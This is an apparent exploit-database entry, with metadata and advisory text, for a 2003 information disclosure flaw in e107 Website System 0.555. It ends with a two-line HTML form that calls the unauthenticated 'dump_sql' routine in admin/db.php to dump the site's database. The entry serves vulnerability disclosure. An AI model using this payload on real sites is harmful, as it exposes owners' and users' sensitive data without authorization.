e107 Website System 0.555 - 'db.php' Information Disclosure
Author: Artoor Petrovich
type: webapps
platform: php
port:
date_added: 2003-07-24
date_updated: 2012-11-27
verified: 1
codes: OSVDB-3856
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/8273/info
e107 Website System 'db.php' has been reported prone to an information disclosure vulnerability.
A remote attacker may exploit this vulnerability to invoke the dump_sql routine without prior authentication. Information returned to the attacker may be of a sensitive nature.
<form action="http://www.example.com/admin/db.php">
<input type=submit name="dump_sql">
</form>